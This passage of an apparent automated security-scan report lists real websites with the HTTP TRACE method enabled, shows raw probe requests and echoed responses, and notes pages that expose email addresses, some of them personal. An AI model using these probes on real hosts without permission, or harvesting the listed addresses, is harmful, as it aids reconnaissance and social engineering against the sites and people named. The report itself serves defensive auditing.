User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D534.24%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_segs=D08734_70008|D08734_72078; rsi_seg=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:36:49 GMT
Content-Length: 48607


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:pas="http://sitelifestage.usatoday.com/2009/pluckApplicatio
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2625"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

19. TRACE method is enabled
There are 25 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


19.1. http://amch.questionmarket.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /

Request

TRACE / HTTP/1.0
Host: amch.questionmarket.com
Cookie: b08ae1315db41d58

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:02 GMT
Server: Apache/2.2.3
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: amch.questionmarket.com
Cookie: b08ae1315db41d58
Connection: Keep-Alive


19.2. http://bh.contextweb.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: 3855d65228893f9d

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Content-Type: message/http
Content-Length: 130
Date: Mon, 09 May 2011 15:39:18 GMT
Connection: Keep-Alive

TRACE / HTTP/1.0
host: bh.contextweb.com
cookie: 3855d65228893f9d
connection: Keep-Alive
cw-userhostaddress: 173.193.214.243

19.3. http://cdn.taboolasyndication.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.taboolasyndication.com
Path:   /

Request

TRACE / HTTP/1.0
Host: cdn.taboolasyndication.com
Cookie: c328576e776c846e

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:30 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: message/http
Accept-Ranges: bytes
Connection: close

TRACE / HTTP/1.1
Host: cdn.taboolasyndication.com
Cookie: c328576e776c846e
Accept-Encoding: gzip
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243
x-chpd-loop: 1
Via: 1.0 PXY013-ASHB.COTENDO.NET (chpd/3.06.0055)


19.4. http://chart.financialcontent.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://chart.financialcontent.com
Path:   /

Request

TRACE / HTTP/1.0
Host: chart.financialcontent.com
Cookie: 16fbde5d29a5045d

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:04 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: chart.financialcontent.com
Cookie: 16fbde5d29a5045d


19.5. http://image2.pubmatic.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: 6ef1e3728c18b854

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:10 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: 6ef1e3728c18b854


19.6. http://matcher-apx.bidder7.mookie1.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher-apx.bidder7.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: matcher-apx.bidder7.mookie1.com
Cookie: 6b65e04d50786ade

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:32 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher-apx.bidder7.mookie1.com
Cookie: 6b65e04d50786ade
Connection: Keep-Alive
MIG_IP: 173.193.214.243


19.7. http://matcher.bidder7.mookie1.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher.bidder7.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: matcher.bidder7.mookie1.com
Cookie: 17883975d524bc8b

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher.bidder7.mookie1.com
Cookie: 17883975d524bc8b
Connection: Keep-Alive
MIG_IP: 173.193.214.243


19.8. http://matcher.bidder8.mookie1.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher.bidder8.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: matcher.bidder8.mookie1.com
Cookie: 19060874b8353c8d

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:13 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher.bidder8.mookie1.com
Cookie: 19060874b8353c8d
Connection: Keep-Alive
MIG_IP: 173.193.214.243


19.9. http://metrics.csmonitor.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.csmonitor.com
Path:   /

Request

TRACE / HTTP/1.0
Host: metrics.csmonitor.com
Cookie: 904d6cd44f4332ac

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:21 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: metrics.csmonitor.com
Cookie: 904d6cd44f4332ac
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


19.10. http://metrics.npr.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.npr.org
Path:   /

Request

TRACE / HTTP/1.0
Host: metrics.npr.org
Cookie: 4a220c9e3494e7

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:57 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: metrics.npr.org
Cookie: 4a220c9e3494e7
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


19.11. http://optimized-by.rubiconproject.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optimized-by.rubiconproject.com
Cookie: e4a4f811c625778

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:58 GMT
Server: RAS/1.3 (Unix)
Connection: close
Content-Type: message/http
Via: CN-5000

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: e4a4f811c625778
Host: optimized-by.rubiconproject.com
Via: CN-5000
X-Forwarded-For: 173.193.214.243


19.12. http://r.openx.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /

Request

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 7dba1280acbc0543

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:12 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 7dba1280acbc0543
X-Forwarded-For: 173.193.214.243


19.13. http://secure-us.imrworldwide.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /

Request

TRACE / HTTP/1.0
Host: secure-us.imrworldwide.com
Cookie: daa16077b9ebe6ce

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:18 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: daa16077b9ebe6ce
Host: secure-us.imrworldwide.com


19.14. http://t.mookie1.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: t.mookie1.com
Cookie: f364a7813ac4956f

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:03 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: t.mookie1.com
Cookie: f364a7813ac4956f
Connection: Keep-Alive
MIG_IP: 173.193.214.243


19.15. http://tacoda.at.atwola.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tacoda.at.atwola.com
Cookie: a1bc66b116bff3e7

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:07 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: a1bc66b116bff3e7
Host: tacoda.at.atwola.com
X-Forwarded-For: 173.193.214.243
X-LB-Client-IP: 173.193.214.243


19.16. http://tracker.bidder7.mookie1.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracker.bidder7.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tracker.bidder7.mookie1.com
Cookie: 73ba4299ea7cd8f4

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:58 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tracker.bidder7.mookie1.com
Cookie: 73ba4299ea7cd8f4
Connection: Keep-Alive
MIG_IP: 173.193.214.243


19.17. http://tracker.financialcontent.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracker.financialcontent.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tracker.financialcontent.com
Cookie: f531a211f560793c

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:04 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tracker.financialcontent.com
Cookie: f531a211f560793c


19.18. http://trc.taboolasyndication.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /

Request

TRACE / HTTP/1.0
Host: trc.taboolasyndication.com
Cookie: 3aae7647c29a6600

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:55 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: trc.taboolasyndication.com
Cookie: 3aae7647c29a6600


19.19. http://usatoday1.112.2o7.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /

Request

TRACE / HTTP/1.0
Host: usatoday1.112.2o7.net
Cookie: 7a283b442d615e10

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:50 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: usatoday1.112.2o7.net
Cookie: 7a283b442d615e10
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


19.20. http://widgets.outbrain.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.outbrain.com
Path:   /

Request

TRACE / HTTP/1.0
Host: widgets.outbrain.com
Cookie: 351757090cc4a7be

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:13 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
Connection: close

TRACE / HTTP/1.1
Cookie: 351757090cc4a7be
Accept-Encoding: gzip
Connection: Keep-Alive
Host: static.outbrain.com
x-cdn: Requested by Cotendo
X-Forwarded-For: 173.193.214.243
x-chpd-loop: 1
Via: 1.0 PXY022-ASHB.COTENDO.NET (chpd/3.06.00
...[SNIP]...

19.21. http://wvue.web.entriq.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wvue.web.entriq.net
Path:   /

Request

TRACE / HTTP/1.0
Host: wvue.web.entriq.net
Cookie: 74bf06981ebc07b1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:17 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: wvue.web.entriq.net
Cookie: 74bf06981ebc07b1
Connection: Keep-Alive


19.22. http://www.collegesurfing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegesurfing.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.collegesurfing.com
Cookie: ca3822cf4b35ed7b

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:10 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerwww.collegesurfing.com=1006764042.20480.0000; path=/

TRACE / HTTP/1.0
Host: www.collegesurfing.com
Cookie: ca3822cf4b35ed7b
X-Forwarded-For: 173.193.214.243


19.23. http://www.npr.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.npr.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.npr.org
Cookie: ba7a4c365968abe3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:57:14 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.npr.org
Cookie: ba7a4c365968abe3
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


19.24. http://www.srh.noaa.gov/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.srh.noaa.gov
Path:   /

Request

TRACE / HTTP/1.0
Host: www.srh.noaa.gov
Cookie: c382280e674291fd

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 15:35:07 GMT
Content-Type: message/http
Server: Apache
Via: 1.1 hyacinth (NetCache NetApp/6.0.3)

TRACE / HTTP/1.1
Host: www.srh.noaa.gov
Connection: keep-alive
Cookie: c382280e674291fd
X-Forwarded-For: 173.193.214.243
Via: 1.0 hyacinth (NetCache NetApp/6.0.3)


19.25. http://www.tinbuadserv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tinbuadserv.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tinbuadserv.com
Cookie: f1f8984fd7ccb88

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:41 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tinbuadserv.com
Cookie: f1f8984fd7ccb88


20. Email addresses disclosed
There are 26 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


20.1. http://radar.weather.gov/Conus/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /Conus/index.php

Issue detail

The following email address was disclosed in the response:

Request

GET /Conus/index.php HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://www.srh.noaa.gov/lmrfc/quickbrief.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=299
Expires: Mon, 09 May 2011 15:41:39 GMT
Date: Mon, 09 May 2011 15:36:40 GMT
Connection: close
Content-Length: 61964

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head>
<title>NWS - Doppler Radar National Mosaic</title>
<meta name="title" content="NWS -
...[SNIP]...
<a href="mailto:SR-SRH.Webmaster@noaa.gov">SR-SRH.Webmaster@noaa.gov</a>
...[SNIP]...

20.2. http://radar.weather.gov/radar.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /radar.php

Issue detail

The following email address was disclosed in the response:

Request

GET /radar.php?rid=hdx&product=N0R&overlay=11101111&loop=no HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://radar.weather.gov/Conus/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=31
Expires: Mon, 09 May 2011 15:38:29 GMT
Date: Mon, 09 May 2011 15:37:58 GMT
Connection: close
Content-Length: 25348

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head>
<title>NWS radar image from Holloman Air Force Base, NM</title>
<meta name=
...[SNIP]...
<a href="mailto:SR-SRH.Webmaster@noaa.gov">SR-SRH.Webmaster@noaa.gov</a>
...[SNIP]...

20.3. http://s.meebocdn.net/cim/script/cim_v92_cim_11_8_0.en.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.meebocdn.net
Path:   /cim/script/cim_v92_cim_11_8_0.en.js

Issue detail

The following email address was disclosed in the response:

Request

GET /cim/script/cim_v92_cim_11_8_0.en.js?1303937101 HTTP/1.1
Host: s.meebocdn.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "2176889624"
If-Modified-Since: Thu, 21 Apr 2011 23:08:27 GMT

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Accept-Ranges: bytes
ETag: "2176889624"
Last-Modified: Thu, 21 Apr 2011 23:08:27 GMT
Date: Mon, 09 May 2011 15:34:59 GMT
Server: lighttpd/1.4.19
Vary: Accept-Encoding
Cache-Control: private, max-age=604800
Age: 473799
Expires: Wed, 11 May 2011 03:58:20 GMT
Connection: Keep-Alive
Content-Length: 241537

// Copyright 2005-2010 Meebo, inc.
//
// RSA javascript implementation Copyright 1998-2005 David Shapiro
// please see http://www.ohdave.com/rsa/
// SHA256 javascript implementation Copyright 2003-200
...[SNIP]...
<a href="mailto:ad-feedback@meebo-inc.com?subject='+
encodeURIComponent("Comment about: "+this.m_ad.getProp("share"))+
'" class="meebo-0 meebo-277">
...[SNIP]...

20.4. http://shop.npr.org/content/vendors/jquery/rater/jquery.rater-custom.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.npr.org
Path:   /content/vendors/jquery/rater/jquery.rater-custom.js

Issue detail

The following email address was disclosed in the response:

Request

GET /content/vendors/jquery/rater/jquery.rater-custom.js HTTP/1.1
Host: shop.npr.org
Proxy-Connection: keep-alive
Referer: http://shop.npr.org/spoken-word/npr-american-chronicles-the-civil-war/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; ShoppingCartSession=dd4agnd4un1d3jrdith74nh772; __utmz=28031614.1304955581.1.1.utmcsr=topnav|utmccn=topnav|utmcmd=topnav; __utma=28031614.1626637707.1304955581.1304955581.1304955581.1; __utmc=28031614; __utmb=28031614.1.10.1304955581; s_cc=true; s_sq=nprorg%3D%2526pid%253DCommunity%25253ANPR.org%252520Registration%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%2525280%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:24 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Expires: Fri, 21 Dec 2020 00:00:00 GMT
Cache-Control: public, no-transform
Connection: close
Content-Type: application/x-javascript
Content-Length: 5136

/**
* jQuery Ajax Rater Plugin
*
* This rater is based on the code Ritesh Agrawal did. Unfortunatly his CSS and the hover technique breaks in some browsers.
* So i thought, why not use the bes
...[SNIP]...
<m3nt0r.de@gmail.com
* @link http://www.m3nt0r.de/devel/raterDemo/ Demonstration and Documentation
* @link http://php.scripts.psu.edu/rja171/widgets/rating.php Based on Ritesh Agrawal Star Rating System
...[SNIP]...

20.5. http://www.fox8live.com/business/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /business/default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /business/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:53 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:38:53 GMT
Age: 0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 28256
Connection: keep-alive
Content-Length: 28256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=21599@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...

20.6. http://www.fox8live.com/content/aboutus/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/aboutus/default.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /content/aboutus/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:34 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:40:52 GMT
Age: 43
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 29278
Connection: keep-alive
Content-Length: 29278


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<a href="mailto:fox8news@fox8tv.net" target="_blank">Fox8news@fox8tv.net</a>
...[SNIP]...
<a href="mailto:hhoffmeister@fox8tv.net" target="_blank">hhoffmeister@fox8tv.net&nbsp;</a>
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24754@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24756@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24755@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...

20.7. http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/news/lee_zurik_investigation/default.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /content/news/lee_zurik_investigation/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:44 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:41:05 GMT
Age: 39
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 40317
Connection: keep-alive
Content-Length: 40317


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<a href="mailto:fox8investigates@fox8tv.net" target="_blank">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24752@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24729@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24702@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24680@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24680@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24653@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24602@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24360@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24074@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24058@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23732@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23688@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
